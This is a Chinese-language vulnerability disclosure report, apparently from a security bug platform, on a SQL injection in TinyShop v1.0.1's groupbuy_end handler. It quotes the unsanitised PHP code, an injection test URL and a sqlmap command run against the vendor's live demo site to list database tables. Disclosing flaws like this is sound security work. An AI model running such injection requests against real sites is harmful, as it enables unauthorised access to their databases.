### 简要描述: TinyShop v1.0.1 SQL注射 可致数据库信息泄露(官网演示+源码分析) 无视gpc ### 详细说明: /protected/controllers/ajax.php ``` //团购结束更新 public function groupbuy_end(){ $id = Req::args('id'); //取得id if($id){ $item = $this->model->table("groupbuy")->where("id=$id")->find(); //无视GPC,直接带入查询 $end_diff = time()-strtotime($item['end_time']); if($end_diff>0){ $this->model->table("groupbuy")->where("id=$id")->data(array('is_end'=>1))->update(); } } } ``` $id无单引号保护,因此无视GPC 何况官网没开GPC(框架里自动stripslashes先,开了也没用) ``` http://shop.tinyrise.com/ajax/groupbuy_end?id=4%27 ``` [<img src="https://images.seebug.org/upload/201406/18220042e57c648aa9f4f745da31361ab4129dc7.png" alt="error.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/18220042e57c648aa9f4f745da31361ab4129dc7.png) 没有引号保护 SQLMAP ``` C:\Users\Administrator>sqlmap.py -u "http://shop.tinyrise.com/ajax/groupbuy_end?id=4" -p id --tables --delay=12 ``` [<img...
### 简要描述: TinyShop v1.0.1 SQL注射 可致数据库信息泄露(官网演示+源码分析) 无视gpc ### 详细说明: /protected/controllers/ajax.php ``` //团购结束更新 public function groupbuy_end(){ $id = Req::args('id'); //取得id if($id){ $item = $this->model->table("groupbuy")->where("id=$id")->find(); //无视GPC,直接带入查询 $end_diff = time()-strtotime($item['end_time']); if($end_diff>0){ $this->model->table("groupbuy")->where("id=$id")->data(array('is_end'=>1))->update(); } } } ``` $id无单引号保护,因此无视GPC 何况官网没开GPC(框架里自动stripslashes先,开了也没用) ``` http://shop.tinyrise.com/ajax/groupbuy_end?id=4%27 ``` [<img src="https://images.seebug.org/upload/201406/18220042e57c648aa9f4f745da31361ab4129dc7.png" alt="error.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/18220042e57c648aa9f4f745da31361ab4129dc7.png) 没有引号保护 SQLMAP ``` C:\Users\Administrator>sqlmap.py -u "http://shop.tinyrise.com/ajax/groupbuy_end?id=4" -p id --tables --delay=12 ``` [<img src="https://images.seebug.org/upload/201406/18220155b72e09effef062f5ba2a599ff42a5496.png" alt="sqlmap001.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/18220155b72e09effef062f5ba2a599ff42a5496.png) [<img src="https://images.seebug.org/upload/201406/182202103fe7d3549a641c173505f84e6f6f89fe.png" alt="sqlmap002.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/182202103fe7d3549a641c173505f84e6f6f89fe.png) [<img src="https://images.seebug.org/upload/201406/18220228b72d4043678ada53232dd86cf26dacc5.png" alt="sqlmap003.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/18220228b72d4043678ada53232dd86cf26dacc5.png) 都已经delay 12了 丢包还是惊人,不过还是跑出数据库名了 ### 漏洞证明: ``` C:\Users\Administrator>sqlmap.py -u "http://shop.tinyrise.com/ajax/groupbuy_end?id=4" -p id --tables --delay=12 ``` [<img src="https://images.seebug.org/upload/201406/18220155b72e09effef062f5ba2a599ff42a5496.png" alt="sqlmap001.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/18220155b72e09effef062f5ba2a599ff42a5496.png) [<img src="https://images.seebug.org/upload/201406/182202103fe7d3549a641c173505f84e6f6f89fe.png" alt="sqlmap002.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/182202103fe7d3549a641c173505f84e6f6f89fe.png) [<img src="https://images.seebug.org/upload/201406/18220228b72d4043678ada53232dd86cf26dacc5.png" alt="sqlmap003.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/18220228b72d4043678ada53232dd86cf26dacc5.png) 都已经delay 12了 丢包还是惊人,不过还是跑出数据库名了
